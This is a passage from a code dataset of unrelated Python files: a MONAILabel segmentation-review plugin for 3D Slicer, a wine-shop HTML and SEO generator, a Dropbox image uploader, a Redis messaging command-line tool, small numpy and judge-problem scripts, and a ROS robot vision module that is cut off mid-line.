cleanedStr.split(\",\")\n return list(dict.fromkeys(idsList)) # remove all duplicates\n\n # Section: Dicom stream\n # Button: Approve\n def approveSegmentation(self):\n statusApproved = self.ui.btn_approved.isChecked()\n statusFlagged = self.ui.btn_mark_revision.isChecked()\n\n if statusFlagged or self.finalStatus == self.STATUS.FLAGGED:\n self.ui.btn_mark_revision.setChecked(False)\n self.ui.btn_mark_revision.setDown(False)\n if statusApproved:\n self.finalStatus = self.STATUS.APPROVED\n self.ui.btn_approved.setChecked(True)\n else:\n self.finalStatus = \"\"\n self.updateDisplayImageMetaData()\n\n # Button: Flagge\n def flagSegmentation(self):\n statusApproved = self.ui.btn_approved.isChecked()\n statusFlagged = self.ui.btn_mark_revision.isChecked()\n\n if statusApproved or self.finalStatus == self.STATUS.APPROVED:\n self.ui.btn_approved.setChecked(False)\n self.ui.btn_approved.setDown(False)\n if statusFlagged:\n self.finalStatus = self.STATUS.FLAGGED\n self.ui.btn_mark_revision.setChecked(True)\n else:\n self.finalStatus = \"\"\n self.updateDisplayImageMetaData()\n\n # Button: Clear\n def clearButtons(self):\n self.ui.btn_mark_revision.setChecked(False)\n self.ui.btn_approved.setChecked(False)\n\n self.ui.btn_mark_revision.setDown(False)\n self.ui.btn_approved.setDown(False)\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n def disableButtons(self):\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n # Button: Easy\n def setEasy(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelEasy:\n self.finalLevel = self.LEVEL.EASY\n\n if levelEasy is False and self.finalLevel == self.LEVEL.EASY:\n self.finalLevel = \"\"\n\n if levelMedium or levelHard or (self.finalLevel == self.LEVEL.HARD) or (self.finalLevel == self.LEVEL.MEDIUM):\n\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n self.ui.btn_medium.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Medium\n def setMedium(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelMedium:\n self.finalLevel = self.LEVEL.MEDIUM\n\n if levelMedium is False and self.finalLevel == self.LEVEL.MEDIUM:\n self.finalLevel = \"\"\n\n if levelEasy or levelHard or (self.finalLevel == self.LEVEL.HARD) or (self.finalLevel == self.LEVEL.EASY):\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_hard.setChecked(False)\n self.ui.btn_easy.setDown(False)\n self.ui.btn_hard.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Hard\n def setHard(self):\n levelEasy = self.ui.btn_easy.isChecked()\n levelMedium = self.ui.btn_medium.isChecked()\n levelHard = self.ui.btn_hard.isChecked()\n\n if levelHard:\n self.finalLevel = self.LEVEL.HARD\n\n if levelHard is False and self.finalLevel == self.LEVEL.HARD:\n self.finalLevel = \"\"\n\n if levelEasy or levelMedium or (self.finalLevel == self.LEVEL.MEDIUM) or (self.finalLevel == self.LEVEL.EASY):\n\n self.ui.btn_easy.setChecked(False)\n self.ui.btn_medium.setChecked(False)\n self.ui.btn_easy.setDown(False)\n self.ui.btn_medium.setDown(False)\n\n self.updateDisplayImageMetaData()\n\n # Button: Next\n def getNextSegmentation(self):\n \"\"\"\n after triggering next button:\n 1. persist meta data in monai server\n 2. update progess bar\n 3. load next dicom & segmentation\n \"\"\"\n\n # Persist MetaData\n self.persistMetaInMonaiServer()\n\n # Request Next Image\n self.imageCounter += 1\n\n if self.imageCounter >= len(self.listImageData):\n message = f\"{self.getCurrentTime()}: End of list has been reached.\"\n slicer.util.warningDisplay(message)\n self.imageCounter = len(self.listImageData) - 1\n return\n self.updateHorizontalSlider()\n self.currentImageData = self.listImageData[self.imageCounter]\n\n # Displays Next Image\n self.loadNextImage(self.currentImageData)\n\n # Monai Server: Put\n def persistMetaInMonaiServer(self):\n \"\"\"\n Sends the updated meta data of dicom and segmentation to monai-server\n Monai-server incorporates that information into datastore.json file\n \"\"\"\n updatedMetaJson = self.updateImageData()\n imageId = self.currentImageData.getName()\n logging.info(\"updatedMetaJson\")\n logging.info(updatedMetaJson)\n if updatedMetaJson == \"\":\n return\n self.logic.updateLabelInfo(imageId, updatedMetaJson)\n\n def updateImageData(self) -> str:\n \"\"\"\n update meta data in information box\n Returns:\n jsonStr (str): json dictionary which is transformed string\n contains updated meta data\n \"\"\"\n self.finalComment = self.ui.plainText_comment.toPlainText()\n\n logging.info(\"Status: \" + self.finalLevel)\n if self.currentImageData.isEqualSegmentationMeta(\n status=self.finalStatus, level=self.finalLevel, approvedBy=self.selectedReviewer, comment=self.finalComment\n ):\n logging.info(f\"{self.getCurrentTime()}: No changes for image (id='{self.currentImageData.getName()}')\")\n return \"\"\n\n self.currentImageData.updateSegmentationMeta(\n status=self.finalStatus, level=self.finalLevel, approvedBy=self.selectedReviewer, comment=self.finalComment\n )\n jsonStr = self.currentImageData.getMeta()\n\n if jsonStr is None:\n logging.info(f\"{self.getCurrentTime()}: No update for Image (id='{self.currentImageData.getName()}')\")\n return \"\"\n logging.info(f\"{self.getCurrentTime()}: Successfully updated Image (id='{self.currentImageData.getName()}')\")\n return jsonStr\n\n # Button: Previouse\n def getPreviousSegmenation(self):\n \"\"\"\n Loads the previous dicom and corresponding segmentation\n after useres tiggers Previous-Button\n \"\"\"\n self.imageCounter -= 1\n if self.imageCounter < 0:\n message = f\"{self.getCurrentTime()}: Lower limit of data set has been reached.\"\n slicer.util.warningDisplay(message)\n self.imageCounter = 0\n return\n self.updateHorizontalSlider()\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n\n def clearImageData(self):\n self.ui.lineEdit_image_id.setText(\"\")\n self.ui.lineEdit_status.setText(\"\")\n self.ui.lineEdit_segmentator.setText(\"\")\n self.ui.lineEdit_level.setText(\"\")\n self.ui.lineEdit_date.setText(\"\")\n self.ui.plainText_comment.setPlainText(\"\")\n\n def displayImageMetaData(self, imageData):\n \"\"\"\n Displays meta info of dicom and segmentation in the info box on slicer\n\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n \"\"\"\n self.clearImageData()\n self.clearButtons()\n\n self.ui.lineEdit_image_id.setText(imageData.getName())\n self.ui.lineEdit_segmentator.setText(imageData.getClientId())\n self.ui.lineEdit_date.setText(imageData.getTime())\n\n self.ui.lineEdit_status.setText(imageData.getStatus())\n self.ui.plainText_comment.setPlainText(imageData.getComment())\n\n if imageData.isApproved():\n self.finalStatus = self.STATUS.APPROVED\n self.ui.btn_approved.setChecked(True)\n self.ui.btn_approved.setDown(True)\n\n if imageData.isFlagged():\n self.finalStatus = self.STATUS.FLAGGED\n self.ui.btn_mark_revision.setChecked(True)\n self.ui.btn_mark_revision.setDown(True)\n\n if imageData.getLevel() != \"\":\n self.finalLevel = imageData.getLevel()\n if self.finalLevel == self.LEVEL.EASY:\n self.ui.btn_easy.setDown(True)\n self.ui.btn_easy.setChecked(True)\n self.setEasy()\n if self.finalLevel == self.LEVEL.MEDIUM:\n self.ui.btn_medium.setDown(True)\n self.ui.btn_medium.setChecked(True)\n self.setMedium()\n if self.finalLevel == self.LEVEL.HARD:\n self.ui.btn_hard.setDown(True)\n self.ui.btn_hard.setChecked(True)\n self.setHard()\n self.ui.lineEdit_level.setText(imageData.getLevel())\n\n def updateDisplayImageMetaData(self):\n \"\"\"\n Displays updated level (easy, medium, hard)\n in the info box on slicer\n \"\"\"\n self.ui.lineEdit_status.setText(self.finalStatus)\n self.ui.lineEdit_level.setText(self.finalLevel)\n\n def loadNextImage(self, imageData):\n \"\"\"\n Loads original Dicom image and Segmentation into slicer window\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n which is required for rest request to monai server\n in order to get dicom and segmenation (.nrrd).\n \"\"\"\n slicer.mrmlScene.Clear()\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n\n self.clearButtons()\n self.displayImageMetaData(imageData)\n self.logic.loadDicomAndSegmentation(imageData)\n\n if imageData.getStatus() != self.STATUS.NOT_SEGMENTED:\n self.displayLabelOfSegmentation()\n\n # Section: Display label\n def addSegmentator(self):\n self.segmentEditorWidget.setMasterVolumeNodeSelectorVisible(False)\n self.segmentEditorWidget.setSegmentationNodeSelectorVisible(False)\n self.segmentEditorWidget.setSwitchToSegmentationsButtonVisible(False)\n\n self.segmentEditorWidget.setMRMLScene(slicer.mrmlScene)\n self.segmentEditorWidget.unorderedEffectsVisible = False\n self.segmentEditorWidget.setReadOnly(True)\n self.segmentEditorWidget.setEffectNameOrder([])\n\n def displayLabelOfSegmentation(self):\n self.selectParameterNode()\n self.getDefaultMasterVolumeNodeID()\n self.segmentEditorWidget.SegmentationNodeComboBox.setCurrentNodeIndex(0)\n self.segmentEditorWidget.MasterVolumeNodeComboBox.setCurrentNodeIndex(0)\n\n def selectParameterNode(self):\n # Select parameter set node if one is found in the scene, and create one otherwise\n segmentEditorSingletonTag = \"SegmentEditor\"\n segmentEditorNode = slicer.mrmlScene.GetSingletonNode(segmentEditorSingletonTag, \"vtkMRMLSegmentEditorNode\")\n if segmentEditorNode is None:\n segmentEditorNode = slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLSegmentEditorNode\")\n segmentEditorNode.UnRegister(None)\n segmentEditorNode.SetSingletonTag(segmentEditorSingletonTag)\n segmentEditorNode = slicer.mrmlScene.AddNode(segmentEditorNode)\n self.segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)\n\n def getDefaultMasterVolumeNodeID(self):\n layoutManager = slicer.app.layoutManager()\n firstForegroundVolumeID = None\n # Use first background volume node in any of the displayed layouts.\n # If no beackground volume node is in any slice view then use the first\n # foreground volume node.\n for sliceViewName in layoutManager.sliceViewNames():\n sliceWidget = layoutManager.sliceWidget(sliceViewName)\n if not sliceWidget:\n continue\n compositeNode = sliceWidget.mrmlSliceCompositeNode()\n if compositeNode.GetBackgroundVolumeID():\n return compositeNode.GetBackgroundVolumeID()\n if compositeNode.GetForegroundVolumeID() and not firstForegroundVolumeID:\n firstForegroundVolumeID = compositeNode.GetForegroundVolumeID()\n # No background volume was found, so use the foreground volume (if any was found)\n return firstForegroundVolumeID\n\n\nclass MONAILabelReviewerLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Called when the logic class is instantiated. Can be used for initializing member variables.\n \"\"\"\n ScriptedLoadableModuleLogic.__init__(self)\n self.temp_dir = None\n\n self.imageDataController: ImageDataController = ImageDataController()\n\n # Section: Server\n def getServerUrl(self) -> str:\n return self.imageDataController.getServerUrl()\n\n def getCurrentTime(self) -> datetime:\n return datetime.datetime.now()\n\n def connectToMonaiServer(self, serverUrl: str) -> bool:\n return self.imageDataController.connectToMonaiServer(serverUrl)\n\n def getMapIdToImageData(self) -> Dict[str, ImageData]:\n \"\"\"\n Returns dictionary (Dict[str:ImageData]) which maps id to Imagedata-object\n \"\"\"\n return self.imageDataController.getMapIdToImageData()\n\n def initMetaDataProcessing(self) -> bool:\n return self.imageDataController.initMetaDataProcessing()\n\n def getStatistics(self) -> dict:\n return self.imageDataController.getStatistics()\n\n def getClientIds(self) -> List[str]:\n return self.imageDataController.getClientIds()\n\n def getReviewers(self) -> List[str]:\n return self.imageDataController.getReviewers()\n\n # Section: Loading images\n def getAllImageData(self, segmented, isNotSegmented, isApproved, isFlagged) -> List[ImageData]:\n return self.imageDataController.getAllImageData(segmented, isNotSegmented, isApproved, isFlagged)\n\n def getImageDataByClientId(self, selectedClientId, isApproved, isFlagged) -> List[ImageData]:\n return self.imageDataController.getImageDataByClientId(selectedClientId, isApproved, isFlagged)\n\n def getPercentageApproved(self, selectedClientId):\n percentageApprovedOfClient, idxApprovedOfClient = self.imageDataController.getPercentageApproved(\n selectedClientId\n )\n return percentageApprovedOfClient, idxApprovedOfClient\n\n def getPercentageSemgmentedByClient(self, selectedClientId):\n percentageSemgmentedByClient, idxSegmentedByClient = self.imageDataController.getPercentageSemgmentedByClient(\n selectedClientId\n )\n return percentageSemgmentedByClient, idxSegmentedByClient\n\n # Section: Search Image\n def getMultImageDataByIds(self, idList) -> Dict[str, ImageData]:\n return self.imageDataController.getMultImageDataByIds(idList)\n\n def searchByAnnotatorReviewer(\n self, selectedAnnotator: str, selectedReviewer: str, isApproved: bool, isFlagged: bool\n ) -> Dict[str, ImageData]:\n return self.imageDataController.searchByAnnotatorReviewer(\n selectedAnnotator, selectedReviewer, isApproved, isFlagged\n )\n\n def searchByLevel(self, isEasy: bool, isMedium: bool, isHard: bool) -> Dict[str, ImageData]:\n return self.imageDataController.getImageDataByLevel(isEasy=isEasy, isMedium=isMedium, isHard=isHard)\n\n # Section: Dicom stream\n def updateLabelInfo(self, imageId, updatedMetaJson):\n self.imageDataController.updateLabelInfo(imageId, updatedMetaJson)\n\n def loadDicomAndSegmentation(self, imageData):\n \"\"\"\n Loads original Dicom image and Segmentation into slicer window\n Parameters:\n imageData (ImageData): Contains meta data (of dicom and segmenation)\n which is required for rest request to monai server\n in order to get dicom and segmenation (.nrrd).\n \"\"\"\n # Request dicom\n image_name = imageData.getFileName()\n image_id = imageData.getName()\n node_name = imageData.getNodeName()\n checksum = imageData.getCheckSum()\n logging.info(\n \"{}: Request Data image_name='{}', node_name='{}', image_id='{}', checksum='{}'\".format(\n self.getCurrentTime(), image_name, node_name, image_id, checksum\n )\n )\n\n self.requestDicomImage(image_id, image_name, node_name, checksum)\n self.setTempFolderDir()\n\n # Request segmentation\n if imageData.isSegemented():\n segmentationFileName = imageData.getSegmentationFileName()\n img_blob = self.imageDataController.reuqestSegmentation(image_id)\n destination = self.storeSegmentation(img_blob, segmentationFileName, self.temp_dir.name)\n self.displaySegmention(destination)\n os.remove(destination)\n logging.info(f\"{self.getCurrentTime()}: Removed file at {destination}\")\n\n def storeSegmentation(\n self, response: requests.models.Response, segmentationFileName: str, tempDirectory: str\n ) -> str:\n \"\"\"\n stores loaded segmenation temporarily in local directory\n Parameters:\n response (requests.models.Response): contains segmentation data\n image_id (str): image id of segmentation\n \"\"\"\n segmentation = response.content\n destination = self.getPathToStore(segmentationFileName, tempDirectory)\n with open(destination, \"wb\") as img_file:\n img_file.write(segmentation)\n logging.info(f\"{self.getCurrentTime()}: Images is stored in: {destination}\")\n return destination\n\n def getPathToStore(self, segmentationFileName: str, tempDirectory: str) -> str:\n return tempDirectory + \"/\" + segmentationFileName\n\n def displaySegmention(self, destination: str):\n \"\"\"\n Displays the segmentation in slicer window\n \"\"\"\n segmentation = slicer.util.loadSegmentation(destination)\n\n def requestDicomImage(self, image_id: str, image_name: str, node_name: str, checksum: str):\n download_uri = self.imageDataController.getDicomDownloadUri(image_id)\n sampleDataLogic = SampleData.SampleDataLogic()\n _volumeNode = sampleDataLogic.downloadFromURL(\n nodeNames=node_name, fileNames=image_name, uris=download_uri, checksums=checksum\n )[0]\n\n def setTempFolderDir(self):\n \"\"\"\n Create temporary dirctory to store the downloaded segmentation (.nrrd)\n \"\"\"\n if self.temp_dir is None:\n self.temp_dir = tempfile.TemporaryDirectory()\n logging.info(f\"{self.getCurrentTime()}: Temporary Directory: '{self.temp_dir.name}'\")\n\n\nclass MONAILabelReviewerTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\"Do whatever is needed to reset the state - typically a scene clear will be enough.\"\"\"\n slicer.mrmlScene.Clear()\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\"\"\"\n self.setUp()\n self.test_MONAILabelReviewer1()\n\n def test_MONAILabelReviewer1(self):\n \"\"\"Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n","repo_name":"davgit/MONAILabel","sub_path":"plugins/slicer/MONAILabelReviewer/MONAILabelReviewer.py","file_name":"MONAILabelReviewer.py","file_ext":"py","file_size_in_byte":49467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"40159404135","text":"from collections import Counter\nfrom turtle import title\nfrom typing import List\n\n\nfrom jinja2 import Environment, FileSystemLoader\nfrom tilda_combine.enginie.product_objects import CardObject\n\n\ncard_name_ = 'Cheval'\n\ncard = CardObject('tilda_combine/winetime.sqlite', 'bordeaux', card_name_)\n\ncounter = card.counter()\n\n'''\nЛевый блок с интересными фактами, терруаром, кнопкой\nи особенностями производства\n'''\ncard_name = card.brand\nvintage = card.vintage\nfact = card.fact\nlandscape = card.landscape\nfactory_process = card.factory_process\nbutton_url = card.button_url\nurl = card.url\nvol = card.value\n\n'''\nБлок с таблицей харакетеристик\n'''\nwine = card.wine\ncountry = card.country\nregion = card.region\nsub_region = card.sub_region\nblend = card.blend\nsquare = card.square\nvin_age = card.vin_age\nvalue = card.value\nvol = card.vol\npotential = card.potential\n\n'''\nБлок с оценками и рекомендациями\n'''\ndecanter = card.decanter\ncollection = card.collection\nrp = card.score_rp\nws = card.score_ws\njr = card.score_jr\n\nfrance = 'sss'\n\n\ndef create_html():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/output/{card_name[row].lower().replace(\" \", \"_\")}_{vintage[row]}.html' , 'a') as file:\n print(rp[row])\n if region[row]:\n re_url = f'https://winetime.moscow/shop?tfc_charact:64922[138361030]={region[row]}&tfc_div=:::'\n region_url = [re_url for _ in range(counter)]\n if sub_region[row]:\n sub_url = f'https://winetime.moscow/shop?tfc_charact:66641[138361030]={sub_region[row]}&tfc_div=:::'\n sub_region_url = [sub_url for _ in range(counter)]\n if country[row]:\n co_url = f'https://winetime.moscow/shop?tfc_charact:60386[138361030]={country[row]}&tfc_div=:::'\n country_url = [co_url for _ in range(counter)]\n if int(rp[row]) > 90:\n rp_class = 'rp_green_class'\n else:\n rp_class = 'rp_yellow_class'\n if ws[row]:\n if int(ws[row]) > 90:\n ws_class = 'ws_green_class'\n else:\n ws_class = 'ws_yellow_class'\n else:\n ws_class = ''\n file_loader = FileSystemLoader('')\n env = Environment(loader=file_loader)\n tm = env.get_template('tilda_combine/html_generator/template/tamplate.html')\n msg = tm.render(card_name=card_name[row], vintage=vintage[row], fact=fact[row],\n landscape=landscape[row], factory_process=factory_process[row],\n button_url=button_url[row], country=country[row],\n region=region[row], sub_region=sub_region[row], blend=blend[row],\n square=square[row], vin_age=vin_age[row], value=value[row], vol=vol[row],\n potential=potential[row], wine=wine[row], decanter=decanter[row], rp=rp[row],\n ws=ws[row], jr=jr[row], collection=collection[row], region_url=region_url[row],\n country_url=country_url[row], sub_region_url=sub_region_url[row], rp_class=rp_class,\n ws_class=ws_class)\n file.write(msg)\n file.close()\n\n\ndef create_alt_seo():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/alt_seo_tags/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n msg = f'{card_name[row]} {vintage[row]} в винотеке WineTime (Москва, Бутлерова 17Б) \\n'\n file.write(msg)\n file.close()\n\ndef descriptions_generator():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/descriptions/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n description = f'Шеваль Блан {vintage[row]} (оценка: {rp[row]}), главное вино Сент-Эмильона в WineTime. Собственный импорт, лучшие цены и условия хранения, селективный ассортимент.\\n'\n file.write(description)\n file.close()\n\n\ndef titles_generator():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/titles/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n title = f'{card_name[row]} {vintage[row]} — купить по лучшей цене!\\n'\n file.write(title)\n file.close()\n\n\ndef get_url():\n for row in range(counter):\n with open(f'tilda_combine/html_generator/titles/{card_name[row].lower().replace(\" \", \"_\")}.txt', 'a') as file:\n title = f'{url[row]}\\n'\n file.write(title)\n file.close()\n\n\n\nget_url()\n# titles_generator()\n# descriptions_generator()\n# create_html()\n# create_alt_seo()\n\n","repo_name":"dmitriykodolov/schema_converter","sub_path":"tilda_combine/html_generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20130976790","text":"\"\"\" \n ce script tourne en permanence : \n il recherche des fichiers dans le repertoire\n path et il les copie dans une dropbox distante.\n Si tout se passe bien, il supprime les fichiers locaux.\n\"\"\"\n\nimport os\nimport time\npath=\"./images/\"\ndef upload_files():\n if not os.path.exists(path):\n return\n dir_list = os.listdir(path)\n first_10 = dir_list[:10]\n for file_name in first_10:\n file_full_path = path + file_name\n print(file_full_path) \n cmd = \"./DropBox/Dropbox-Uploader/dropbox_uploader.sh upload \" + file_full_path + \" .\"\n returnCode=os.system(cmd)\n # ne supprimer les fichiers que si la commande s'est bien deroulee\n if returnCode == 0:\n os.remove(file_full_path)\n else:\n print(\"Erreur lors de l'appel du script\")\n print (returnCode)\n\n \nif __name__ == \"__main__\":\n while True:\n print(\"Uploadingfile\")\n upload_files()\n time.sleep(10)\n","repo_name":"romanaccio/aidevig-rasp","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31258898847","text":"import redis\nfrom src.logger import Logger\nfrom src.controllers.authorisation import Authorisation\nfrom src.controllers.messages import Messages\n\nconnection = redis.Redis(host=\"192.168.99.102\", charset=\"utf-8\", decode_responses=True)\n\n\ndef run_interface():\n auth = Authorisation()\n messages = Messages()\n user_id = -1\n logged_in = False\n listener = Logger(connection)\n listener.setDaemon(True)\n listener.start()\n\n while True:\n if not logged_in:\n display_start_menu()\n command = int(input(\"$ \"))\n if command == 1:\n login = input(\"Enter your login: \")\n auth.signup(login)\n\n elif command == 2:\n login = input(\"Enter your login: \")\n user_id = auth.login(login)\n logged_in = user_id != -1\n\n elif command == 3:\n break\n\n else:\n print(\"No such operation\")\n\n else:\n display_menu()\n command = int(input(\"$ \"))\n\n if command == 1:\n msg = input(\"Write your message: \")\n receiver_login = input(\"Write the login of person you want to get this message: \")\n\n receiver = connection.hget(\"users:\", receiver_login)\n if receiver is not None:\n messages.create(msg, user_id, int(receiver))\n print(\"Message sent!\")\n else:\n print(\"Receiver does not exist!\")\n\n elif command == 2:\n messages.get_all(user_id)\n\n elif command == 3:\n current = connection.hmget(\"user:%s\" % user_id,\n ['in_queue', 'checking', 'blocked', 'sent',\n 'delivered'])\n print(\n \"In queue: %s\\nIs checking: %s\\nBlocked: %s\\nSent: %s\\nDelivered: %s\" % tuple(current))\n\n elif command == 4:\n login = connection.hmget(\"user:%s\" % user_id, [\"login\"])[0]\n auth.logout(login)\n logged_in = False\n user_id = -1\n\n else:\n print(\"No such operation\\n\")\n\n\ndef display_start_menu():\n print(\"Welcome to messaging tool! Sign up to start using! Or login if you already have an account\")\n print(\"Sign up(1)\")\n print(\"Log in(2)\")\n print(\"Close(3)\")\n\n\ndef display_menu():\n print(\"\\nSend new message(1)\")\n print(\"Received messages(2)\")\n print(\"Messages' info(3)\")\n print(\"Log out(4)\")\n\n\nif __name__ == '__main__':\n run_interface()\n","repo_name":"artyoda05/Tiutiunnyk_db_sem2","sub_path":"lab2/src/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20940984337","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfilename = './befkbhalderstatkode.csv'\n\nbef_stats_df = np.genfromtxt(\n filename, delimiter=',', dtype=np.uint, skip_header=1)\nprint(type(bef_stats_df), ' of size: ', bef_stats_df.size)\nprint('The skip_header=1 means that we have only the data\\n\\nfirst line:\\n',\n bef_stats_df[0], '\\nlast line\\n', bef_stats_df[len(bef_stats_df)-1])\n\ndd = bef_stats_df\nmask = (dd[:, 0] == 1998) # for all rows filter column/index = 0 to be 1998\ndd[mask]\n\nmask = (dd[:, 0] == 2015) & (dd[:, 2] == 18) & (dd[:, 3] == 5100)\nprint(dd[mask])\nplt.axis([0, 10, 300, 600])\nplt.bar(dd[:, 1], dd[:, 4])\nnp.sum(dd[mask][:, 4])\nplt.show()\n","repo_name":"MalteMagnussen/PythonProjects","sub_path":"week4/numpy/bigdata.py","file_name":"bigdata.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18402277883","text":"import collections\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\npokemon1 = [None] * (n + 1)\npokemon2 = collections.defaultdict()\nidx = 1\nfor i in range(n):\n name = input().strip()\n pokemon1[idx] = name\n pokemon2[name] = idx\n idx += 1\n\nresult = ''\nproblems = [input().strip() for _ in range(m)]\nfor problem in problems:\n if problem.isdigit():\n result += pokemon1[int(problem)] + '\\n'\n else:\n result += str(pokemon2[problem]) + '\\n'\n\nprint(result)","repo_name":"Yiseull/baekjoon-python3","sub_path":"실버/1620_나는야 포켓몬 마스터 이다솜.py","file_name":"1620_나는야 포켓몬 마스터 이다솜.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3764406227","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\n\ntry:\n import RPi.GPIO as GPIO\n from crues_sensors.msg import Vision\n from std_msgs.msg import Bool\n from imutils.video import VideoStream\n import rospy\n pi = True\nexcept ImportError:\n import crues.GPIO_MOCK as GPIO\n pi = False\n\n\nclass RobotDetector:\n def __init__(self):\n self.name = rospy.get_param('hostname', 'robot')\n self.robots = [r for r in rospy.get_param('robots', []) if r['name'] != self.name]\n self.goals = rospy.get_param('goals', [])\n if pi:\n frame_size = (640, 480)\n self.frame_rate = rospy.get_param('~framerate', 10)\n self.cap = VideoStream(src=0, usePiCamera=pi, resolution=frame_size,\n framerate=self.frame_rate).start()\n rospy.init_node(\"vision\", anonymous=False)\n self.recording = rospy.get_param(\"~recording\", False)\n self.robot_pub = rospy.Publisher('robots_detected', Vision, queue_size=10)\n self.goal_pub = rospy.Publisher('goal_detected', Bool, queue_size=10)\n self.rate = rospy.Rate(self.frame_rate)\n if self.recording:\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.recorder = cv2.VideoWriter('/home/crues/rosbag/output.avi', fourcc, self.frame_rate, (640, 480))\n else:\n self.cap = cv2.VideoCapture(1)\n\n def search(self, search_frame, objects):\n \"\"\"Search search_frame for objects and return relevant information\n @:returns found - list of objects found\n @:returns coords - list of (x, y) tuples of centre of mass of objects\n @:returns outlines - list of object outlines\n \"\"\"\n found, coords, outlines = [], [], []\n for o in objects:\n colour_mask = self.get_colour_mask(search_frame, o['hsv_min'], o['hsv_max'])\n _, contours, _ = cv2.findContours(colour_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n maxsize = 0\n cx, cy, outline = None, None, None\n obj_found = False\n for c in contours:\n if cv2.contourArea(c) > max((10000, maxsize)): # & cv2.arcLength(c,True):\n maxsize = cv2.contourArea(c)\n cx, cy = self.get_centre_point(c)\n outline = self.get_outline(c)\n obj_found = True\n if obj_found:\n found.append(o)\n coords.append((cx, cy))\n outlines.append(outline)\n return found, coords, outlines\n\n def get_colour_mask(self, frame, lower_hsv_bound, higher_hsv_bound):\n \"\"\"Return a Boolean mask the size of frame, where 1's\n are where 'frames' pixel is within the colour range\"\"\"\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n if lower_hsv_bound[0] > higher_hsv_bound[0]:\n mask1 = cv2.inRange(hsv_frame, np.array([0, lower_hsv_bound[1], lower_hsv_bound[2]]),\n np.array(higher_hsv_bound))\n mask2 = cv2.inRange(hsv_frame, np.array(lower_hsv_bound),\n np.array([179, higher_hsv_bound[1], higher_hsv_bound[2]]))\n mask = mask1 | mask2\n else:\n lower = np.array(lower_hsv_bound)\n upper = np.array(higher_hsv_bound)\n mask = cv2.inRange(hsv_frame, lower, upper)\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.erode(mask, kernel, iterations=1)\n mask = cv2.dilate(mask, kernel, iterations=1)\n return mask\n\n def get_outline(self, contour):\n \"\"\"return the approximate polygon surrounding the contour\"\"\"\n epsilon = 0.01 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n return approx\n\n def get_centre_point(self, contour):\n \"\"\"find centre of mass of contour\"\"\"\n M = cv2.moments(contour)\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / 